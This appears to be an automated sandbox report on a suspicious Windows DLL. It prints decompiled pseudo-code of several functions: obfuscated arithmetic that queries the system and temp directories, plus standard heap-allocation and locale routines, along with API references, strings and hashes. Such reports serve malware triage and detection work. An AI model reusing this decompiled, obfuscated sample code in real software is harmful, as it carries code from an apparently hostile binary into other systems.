				_t286 =  *0x6e285a90 * 0x10e1d;
				_t178 =  *0x6e2859d8; // 0x8810b8d4
				_t287 = 0x6e285a28;
				 *0x6e2859d8 = _t178 * _t286;
				_t340 =  *0x6e285a90; // 0x896cd2f8
				_t180 =  *0x6e2859d0; // 0x90eff98a
				 *0x6e2859dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6e285a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6e2859dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6e2859d8 = _t184;
						_t427 = _t184 -  *0x6e285a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6e285a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6e285a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6E1C0D32();
				_t364 =  *0x6e285a90; // 0x896cd2f8
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6e2859dc; // 0x6
				_t188 =  *0x6e2859d8; // 0x8810b8d4
				_t190 =  *0x6e2859f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6e2859e6; // 0x1945
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6e2859e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6e2859e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6E1E01E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6e285a90 = _t364;
						if(_t364 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6e285a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6e285a98 - _t197; // 0x6e22e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6e285a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6e2859e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6e285a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6e285a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6e2859d8 = _t297;
				 *0x6e2859dc = _t346;
				do {
					if(_t393 != ( *0x6e2859e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0x776d6ef7
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6e285a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0x776d6f2d
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6e2859d8 = _t297;
						 *0x6e2859dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6e2859e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6e2859e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6e2859e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6e285a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6e2859e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6e285a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6e2859d0 = _t105 + _t347;
				_t213 = E6E1C1029(_t394);
				_t300 =  *0x6e285a90; // 0x896cd2f8
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6e285a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6e2859f2 =  *0x6e2859f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6e2859d0 = _t371;
				_t446 =  *0x6e285a04 - 0x1b47; // 0x90
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6e2859e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6e2859d8 = _t349;
					 *0x6e2859dc =  *(_t400 - 0x14);
					_t371 =  *0x6e2859d0; // 0x90eff98a
				}
				_t395 = 0x6e285a0e;
				do {
					if(_t300 != ( *0x6e2859e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6e2859e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6e2859d0 = _t371;
				_t450 =  *0x6e285a02 - _t301; // 0x776e
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6e2859d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6e285a90 = _t117 + _t349 * 2;
				E6E1BFB4A(_t396, _t451);
				_t350 =  *0x6e285a00; // 0x776e8cd0
				_t303 = 0x6e285ac8;
				_t372 =  *0x6e2859d8; // 0x8810b8d4
				do {
					_t452 = _t396 -  *0x6e285a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6e2859dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6e2859d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6e285a00 = _t350;
					} else {
						_t453 = 0 -  *0x6e285a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6e285a18);
				_t222 =  *0x6e2859dc; // 0x6
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6e285a58 =  *0x6e285a58 - _t396;
					asm("sbb [0x6e285a5c], eax");
					 *0x6e285a00 = _t354;
					asm("sbb ecx, [0x6e2859dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6e2859d8 = _t372;
					asm("adc ecx, eax");
					 *0x6e2859dc = 0;
				}
				_t305 =  *0x6e285a90; // 0x896cd2f8
				_t306 =  *0x6e2859d0; // 0x90eff98a
				 *0x6e2859d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6E1E0075(1);
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1C128C
GetSystemDirectoryA.KERNEL32 ref: 6E1C13C5
GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E,?,00000001,?), ref: 6E1C1468

Strings

Y(n, xrefs: 6E1C13E1
Molecul, xrefs: 6E1C167E
Y(n, xrefs: 6E1C1320
C:\Windows\system32, xrefs: 6E1C13B2
Y(n, xrefs: 6E1C1915
6623, xrefs: 6E1C16B1
cd Matter m, xrefs: 6E1C1607
cd Island, xrefs: 6E1C1531
C:\Users\user\AppData\Local\Temp\, xrefs: 6E1C1459
DZ(n, xrefs: 6E1C184B
Y(n, xrefs: 6E1C1801
out drop , xrefs: 6E1C16C8
Had s, xrefs: 6E1C14DF
Y(n, xrefs: 6E1C15FF
6265, xrefs: 6E1C14CB
DZ(n, xrefs: 6E1C136C
DZ(n, xrefs: 6E1C144C
part , xrefs: 6E1C15B5
Y(n, xrefs: 6E1C1A11
Y(n, xrefs: 6E1C191F
DZ(n, xrefs: 6E1C1967
(Z(n, xrefs: 6E1C170E

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (Z(n$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZ(n$DZ(n$DZ(n$DZ(n$Had s$Molecul$cd Island$cd Matter m$out drop $part $Y(n$Y(n$Y(n$Y(n$Y(n$Y(n$Y(n
API String ID: 3607090873-2479991137
Opcode ID: 2c5b1caef2b7afed2534782848eb22a6839aaae409f51b670dd4a9b7359cdd5c
Instruction ID: 64c9d374caad00a3b3af68ee2a3bfd8116c9bb3edc48348fcc9d77a99d08f916
Opcode Fuzzy Hash: 2c5b1caef2b7afed2534782848eb22a6839aaae409f51b670dd4a9b7359cdd5c
Instruction Fuzzy Hash: 8D32B171A81A118FCF04CFA8C4995AE77F3BB5B724B65452AD007DB740E734A889CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C78D3, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E1C78D3(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;

				E6E1E00AC(0x6e228421, __ebx, __edi, __esi, 0);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6e22aa30;
				_t21 = E6E1DF8B6(__edx, __esi, __eflags);
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6E1C7005(__ebx, _t19, _t21); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6E1C7F47(_t19);
				return E6E1E0075(_t19);
			}

0x6e1c78da
0x6e1c78df
0x6e1c78e1
0x6e1c78e3
0x6e1c78ee
0x6e1c78f3
0x6e1c7906
0x6e1c7906
0x6e1c78f5
0x6e1c78f5
0x6e1c78f9
0x6e1c78fb
0x6e1c7901
0x6e1c7901
0x6e1c790a
0x6e1c790d
0x6e1c7919

APIs

__EH_prolog3.LIBCMT ref: 6E1C78DA
std::locale::_Init.LIBCPMT ref: 6E1C78FB

Part of subcall function 6E1C7005: __EH_prolog3.LIBCMT ref: 6E1C700C
Part of subcall function 6E1C7005: std::_Lockit::_Lockit.LIBCPMT ref: 6E1C7017
Part of subcall function 6E1C7005: std::locale::_Setgloballocale.LIBCPMT ref: 6E1C7032
Part of subcall function 6E1C7005: _Yarn.LIBCPMT ref: 6E1C7048
Part of subcall function 6E1C7005: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C7088

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 4e82cabdf547493b8d7938256dda408408391b5c8288b6efc24da6fccfdcb9e0
Instruction ID: ad2a6774963098cc4d8e9ef02b6b89a33c1ac7724ddaffea5f63548127e2b4bf
Opcode Fuzzy Hash: 4e82cabdf547493b8d7938256dda408408391b5c8288b6efc24da6fccfdcb9e0
Instruction Fuzzy Hash: AEE0DF32E21A255BD31297F48501BACA1666F94F24F62041AE101DFAC0DFE8888067C3

Uniqueness

Uniqueness Score: -1.00%

Function 6E20C7EF, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6E20C7EF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				signed int _t17;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e287b04, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E21BEB2();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E202281())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6E209256(_t15, _t16, _t17, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t17 = _t13 % _t20;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6e20c7ef
0x6e20c7f5
0x6e20c7fa
0x6e20c808
0x6e20c808
0x6e20c80e
0x6e20c810
0x6e20c810
0x6e20c827
0x6e20c830
0x6e20c838
0x00000000
0x00000000
0x6e20c818
0x6e20c81a
0x6e20c83c
0x6e20c841
0x6e20c847
0x00000000
0x6e20c847
0x6e20c81d
0x6e20c822
0x6e20c823
0x6e20c825
0x00000000
0x00000000
0x6e20c825
0x00000000
0x6e20c827
0x6e20c800
0x6e20c801
0x6e20c806
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E20D6B4,00000001,00000364,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9), ref: 6E20C830

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 50623d0307c763c3ecb05b67933da9dbd1d28dfa905ee362c407dbd8fb1d76e4
Instruction ID: b3436d37660d85ec07c514272b6c32f69c21cc9f32174384fde2f7eb2c0ca42b
Opcode Fuzzy Hash: 50623d0307c763c3ecb05b67933da9dbd1d28dfa905ee362c407dbd8fb1d76e4
Instruction Fuzzy Hash: 1CF0BB7154552F5BEB539AD69816A47375F9F82F71B1645219C14AE1C4CB30D800C2F4

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F26D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E20F26D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				long _t11;

				_t8 = __ecx;
				_t11 = _a4;
				if(_t11 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6E202281())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t11 == 0) {
					_t11 = _t11 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6e287b04, 0, _t11); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6E21BEB2();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6E209256(_t7, _t8, _t9, _t10, __eflags, _t11);
					_pop(_t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6e20f26d
0x6e20f273
0x6e20f279
0x6e20f2ab
0x6e20f2b0
0x6e20f2b6
0x00000000
0x6e20f2b6
0x6e20f27d
0x6e20f27f
0x6e20f27f
0x6e20f296
0x6e20f29f
0x6e20f2a7
0x00000000
0x00000000
0x6e20f287
0x6e20f289
0x00000000
0x00000000
0x6e20f28c
0x6e20f291
0x6e20f292
0x6e20f294
0x00000000
0x00000000
0x6e20f294
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 78945eb8f71123853590ab6bd4011905647aad285bc9a2ca962dcd76377b9691
Instruction ID: db1c89c45e10d23e5b0023cc8a8724ac2bb0bc9fc8ac7d7920fc89b106feb930
Opcode Fuzzy Hash: 78945eb8f71123853590ab6bd4011905647aad285bc9a2ca962dcd76377b9691
Instruction Fuzzy Hash: C7E0302A18562A9FF75116E69814B8B3B9FAF837B2B2105119C35965C0CB20C801C1A8

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF9E7, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E6E1DF9E7(void* __ebx, void* __ecx, void* __edx) {
				void* _t3;
				void* _t10;

				if(E6E1E079B() == 0) {
					_push(E6E1C815F()); // executed
					_t3 = E6E209E70(__ecx, __edx); // executed
					_pop(_t10);
					if(_t3 == 0) {
						L6E20A4FC(__ebx, _t10);
						goto L5;
					} else {
						return 0;
					}
				} else {
					E6E1E0604(__edx);
					L5:
					return 1;
				}
			}

0x6e1df9ee
0x6e1df9fc
0x6e1df9fd
0x6e1dfa02
0x6e1dfa05
0x6e1dfa0a
0x00000000
0x6e1dfa07
0x6e1dfa09
0x6e1dfa09
0x6e1df9f0
0x6e1df9f0
0x6e1dfa0f
0x6e1dfa11
0x6e1dfa11

APIs

___isa_available_init.LIBCMT ref: 6E1DF9F0

Part of subcall function 6E1E0604: IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E1E061D

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FeaturePresentProcessor___isa_available_init
String ID:
API String ID: 1134542133-0
Opcode ID: 9730a72df3bd01377a0f65105c100b5bb7fbad41c174d80457b8ba70273eb9d5
Instruction ID: 431f9aae761d1691887eb6a75a35fa5ffdd14bd03c547336ce5ccbd5d831bbd8
Opcode Fuzzy Hash: 9730a72df3bd01377a0f65105c100b5bb7fbad41c174d80457b8ba70273eb9d5
Instruction Fuzzy Hash: 45C0804C4005C7159E4051F525145DF234D0DAD7987F41C41F431C5495EF15CDC97033

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E21E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6E21E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6e28506c; // 0x9881d723
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6e20e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E20D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E20D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6e20e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e232f04; // 0x17
					E6E21E68F(0, " )#nU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6e20e03b
					E6E21E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6e20e03b
						E6E21E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6e20e03b
						E6E21E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e232dec; // 0x41
						_t77 = E6E21E68F(_t99, "t!#nE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6E21E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6E2145D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E1DF8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6E2145D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6E225124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E21E112(_t92, _t99,  &_v20);
						} else {
							E6E21E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D65E
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E21E7F8
IsValidCodePage.KERNEL32(00000000), ref: 6E21E853
IsValidLocale.KERNEL32(?,00000001), ref: 6E21E862
GetLocaleInfoW.KERNEL32(?,00001001,; n,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6E21E8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E21E8C9

Strings

)#nU, xrefs: 6E21E751
; n, xrefs: 6E21E715, 6E21E725, 6E21E7E5, 6E21E787, 6E21E77C, 6E21E77F, 6E21E78A, 6E21E7E8
; n, xrefs: 6E21E702, 6E21E8A1
; n, xrefs: 6E21E7C3, 6E21E821, 6E21E7CE
t!#nE, xrefs: 6E21E7A5

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )#nU$; n$; n$; n$t!#nE
API String ID: 745075371-3664795132
Opcode ID: 7918e64115b843f4d7288de4cca1cc8592f7c53be77f0bfec296359a968c75d6
Instruction ID: 677d63c20cf54e1ffeb371a4d9de909f5c362a466d7101c1f585acfbdf4452df
Opcode Fuzzy Hash: 7918e64115b843f4d7288de4cca1cc8592f7c53be77f0bfec296359a968c75d6
Instruction Fuzzy Hash: DD517B7290420FAFEB50DFE5CC44AEA77FAAF05701F154529EA20EB590E7709A418B61

Uniqueness

Uniqueness Score: -1.00%

